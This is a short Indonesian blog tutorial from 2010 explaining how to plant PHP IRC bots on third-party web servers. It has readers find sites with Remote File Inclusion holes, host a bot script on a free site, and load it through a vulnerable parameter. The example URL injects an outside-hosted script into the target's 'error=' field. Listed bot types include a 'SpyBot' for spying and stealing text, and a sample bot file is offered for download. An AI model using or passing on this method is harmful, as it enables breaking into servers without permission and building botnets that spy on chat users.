Cara Membuat Bot PHP - 3 February 2010 - Blog - Personal site

My site
Main | Blog | Registration | Login
Site menu
Our poll
Rate my site
Total of answers: 21
Statistics

Total online: 1
Guests: 1
Users: 0
Login form
Main » 2010 » February » 3 » Cara Membuat Bot PHP
6:39 AM
Cara Membuat Bot PHP
Tutorial ini hanya sekedar sharing aja. Aku masih terlalu Pemula dalam hal ini. Bot PHP adalah script PHP yang dibuat untuk melakukan koneksi ke IRC. Script ini dijalankan pada Server yang mendukung PHP. PHP adalah salah satu jenis bahasa Pemrograman Web.

Yang kita perlukan untuk membuat Bot PHP adalah:

1. Situs target dengan bug RFI;
yaitu situs yang memiliki celah Remote File Inclusion. Situs ini dapat Anda temukan di Server IRC yang sering digunakan untuk kegiatan exploitasi, nanti kita bisa nyari Targetnya disana, butuh waktu yang cukup lama sih, bahkan kadang gx dapat apa² kayak aku, padahal udah nunggu dari pagi ampe sore, 1 hari 10 jam, gx ada hasil. Eits, tunggu dulu... nag, disinilah dituntut kesabaran kamu.
Sabar... Sabar...

2. Script Bot;
a. Fx Bot (Bot untuk meramaikan Channel saja)
b. Fx AIBot (Bot yang dapat berbicara di Channel)
c. Fx SpyBot (Bot untuk melakukan mata² dan pencurian untuk teks² tertentu)
d. Fx29PHPBot (Bot untuk menampilkan bermacam informasi, misalnya tipe hp si Chatter)

3. Situs untuk mengupload/menyimpan Script kamu. Contohnya geocities dan ripway.

Nah... sekarang selanjutnya, anggap aja kita udah dapat target kayak gini -> http//mail.bitcho.com:81/error.php?error= dan Script kita yang udah diupload ke geocities, misal kayak gini -> http://www.geocities.com/arie_88/bot-diam.txt, jd kita tinggal menggabunginya aja dengan membuka link di browser -> http//mail.bitcho.com:81/error.php?error=http://www.geocities.com/arie_88/bot-diam.txt??

Silahkan tunggu aja di Channel tempat Kamu jadikan Markas botnya. Kalau botnya gak join, ada beberapa faktor, misalnya di blok firewall, di ban di Server IRC, atau targetnya busuk, dll. Coba cari target yang baru ampe botnya berhasil masuk ke Channel kamu.

Semoga Berhasil ya...!!! Yach,, jangan murung gitu...
Semangat... Semangat... klo mau pintar

Jika ada pertanyaan tentang Tutorial diatas, Posting aja Komentarnya. Atau Kalian bisa nyari Aku di #Havefun @Allnetwork, nick bUnKLon. Pv aja. Khey...!!!
Contoh file bot phpnya, bisa kalian download disini
Views: 3439 | Added by: ariebunklon | Rating: 1.0/4
Total comments: 0
Name *:
Email *:
Code *:
COMMENT DISINI

ShoutMix chat widget
Search
Calendar
«  February 2010  »
SuMoTuWeThFrSa
 123456
78910111213
14151617181920
21222324252627
28
Entries archive
Site friends
  • Create your own site
  • Copyright MyCorp © 2016 Free website builderuCoz